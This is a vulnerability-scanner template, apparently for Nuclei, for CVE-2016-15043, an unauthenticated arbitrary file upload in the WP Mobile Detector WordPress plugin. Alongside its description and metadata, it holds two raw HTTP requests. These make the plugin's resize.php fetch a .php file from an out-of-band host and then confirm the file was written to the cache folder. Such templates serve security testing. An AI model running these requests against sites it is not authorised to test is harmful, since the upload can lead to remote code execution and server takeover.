id: CVE-2016-15043 info: name: WP Mobile Detector <= 3.5 - Unrestricted File Upload author: D3nverNg,thewindghost severity: critical description: | WP Mobile Detector plugin for WordPress <= 3.5 contains an unrestricted file upload vulnerability caused by missing file type validation in resize.php, letting unauthenticated attackers upload arbitrary files, potentially leading to remote code execution. impact: | Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise. remediation: | Update to the latest version of WP Mobile Detector plugin. reference: - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb - https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/ - https://wpscan.com/vulnerability/e4739674-eed4-417e-8c4d-2f5351b057cf/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-15043 epss-score: 0.85886 epss-percentile: 0.99407 cwe-id: CWE-434 metadata: verified: true max-request: 2 tags: cve,cve2016,wordpress,wp,wp-plugin,file-upload,rce,intrusive,vkev variables: filename: "{{rand_text_alpha(8)}}.php" flow: http(1) && http(2) http: - raw: - | GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://{{interactsh-url}}/{{filename}} HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "http")' - 'contains(content_type, "image/gif")' condition: and internal: true - raw: - | GET /wp-content/plugins/wp-mobile-detector/cache/{{filename}} HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - status_code == 200 - regex('(.*?)', body) condition: and # digest: 4a0a004730450221008be6d6ac6dc54885bbcf1a16dec7822d0633c818f41de4a2d52cf99d7f6fe53f02202d7470f08dd032d1889a708def18e408a3072d03be5e03a6a3061c74224b15d3:922c64590222798bb761d5b6d8e72950